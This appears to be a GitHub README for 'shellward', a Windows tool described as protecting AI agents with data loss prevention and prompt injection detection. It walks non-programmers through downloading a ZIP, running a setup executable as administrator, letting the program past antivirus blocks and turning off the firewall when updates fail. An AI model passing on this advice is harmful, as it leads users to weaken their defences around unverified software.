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🛡️ shellward - Secure Your AI Agent Easily

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📋 What is shellward?

shellward is a software that helps protect AI agents from cyber threats. It adds strong security layers to your AI tools. It helps stop data leaks and keeps your AI safe from harmful commands. The software works without extra add-ons. It has both an SDK and a plugin called OpenClaw to give full control over safety.

This program is made for anyone who needs a safer AI experience. You don’t need to be a programmer to use it.


🚀 Getting Started with shellward

Follow these steps to set up shellward on your Windows computer.

Step 1: Check Your System

Make sure your system meets these basic requirements:

  • Windows 10 or newer
  • At least 4 GB of free disk space
  • Internet connection (only for downloading)
  • Administrator rights to install new software

Step 2: Download shellward

Visit this page to download shellward:

https://github.com/kksharma17/shellward

Click the green "Code" button on the main page and select Download ZIP. Or look for the Releases tab to find the latest version.

Keep the file somewhere easy to find, like your Desktop or Downloads folder.

Step 3: Install shellward

To install the software:

  1. Locate the downloaded ZIP file.
  2. Right-click the file and choose Extract All...
  3. Pick a folder where you want shellward's files to be stored.
  4. Open the extracted folder.
  5. Find the setup file, usually named setup.exe or install.exe.
  6. Double-click that file to start installation.

Follow the on-screen instructions. When asked, allow the software to make changes to your computer by clicking Yes on the security prompt.

Step 4: Run shellward

Once installed, start shellward using one of these options:

  • Find shellward in your Start menu and click to open.
  • Or double-click the shellward icon on your Desktop if available.

shellward opens a simple window with clear options. You can turn on defenses and monitor your AI’s security here.


🛠️ How shellward Works

shellward uses eight layers of security to keep your AI safe. These layers check the data your AI uses and block dangerous commands. Here are some key features:

  • Data Loss Prevention (DLP): Stops sensitive data from leaving your system.
  • Prompt Injection Detection: Finds and blocks harmful inputs designed to trick your AI.
  • No Dependencies: Runs on your Windows PC without needing other programs or libraries.
  • OpenClaw Plugin: An extra tool that adds protection for specific AI software.
  • SDK Support: Developers can use shellward's tools within their own applications.

shellward watches your AI while it runs. Any unusual activity triggers alerts, so you can act quickly.


🎯 Using shellward Step-by-Step

Monitor Data Flow

shellward tracks all the information your AI sends and receives. It shows you if anything looks risky.

  • Open the Dashboard tab after launching shellward.
  • You will see real-time data flow and alerts.
  • If you see warnings, click on them for details.

Set Up Rules

You can customize how shellward protects your AI.

  • Go to the Settings tab.
  • Use simple checkboxes to turn on or off different protections.
  • Save your changes with the Apply button.

Check Security Logs

shellward keeps a record of all security events.

  • Click the Logs tab.
  • Review recent alerts and actions taken by the software.
  • You can export logs as a text file for later review or sharing.

🖥️ System Maintenance and Updates

shellward works best when it stays updated.

  • Open shellward.
  • Click the Update button on the Home screen.
  • If updates are available, the software will download and install them automatically.
  • Restart shellward after updates finish.

Make it a habit to check for updates weekly.


🔧 Troubleshooting

Here are solutions to common problems:

shellward won’t start

  • Restart your computer and try again.
  • Check if any antivirus program is blocking shellward and allow it.
  • Make sure you installed it with Administrator rights.

Can’t see data flow or alerts

  • Confirm your AI software is running together with shellward.
  • Verify your system meets the requirements.

Updates fail to install

  • Disable any firewall temporarily and try again.
  • Check your internet connection.

If problems continue, visit the GitHub page and open an issue to get help.


📥 Download shellward Now

Use this link to visit the download page anytime:

https://github.com/kksharma17/shellward

Click the Releases tab on the page to download the newest version.


🔍 More About shellward

Here are some important topics connected to shellward:

  • Agent Security
  • Data Loss Prevention (DLP)
  • Prompt Injection Detection
  • AI Firewall
  • Runtime Security
  • PII (Personally Identifiable Information) Detection

The software helps reduce risk for AI tools used in many fields, including business, healthcare, and research.


🤝 Support and Resources

If you want to learn more or get help:

  • Look through the Wiki on the GitHub repo for guides and tips.
  • Check the Issues section to see if others had similar questions.
  • You can ask for help by opening a new issue on the GitHub page.

⚙️ Privacy and Security

shellward runs all protection locally on your PC. It does not send your data to any servers. Your privacy stays safe while your AI is guarded.


🗂️ Topics and Keywords

agent-security, ai-agent, ai-firewall, ai-safety, ai-security, claude-code, cursor, data-exfiltration, dlp, guardrails, langchain, llm-security, mcp, mcp-security, openclaw, pii-detection, prompt-injection, runtime-security, security, shellward

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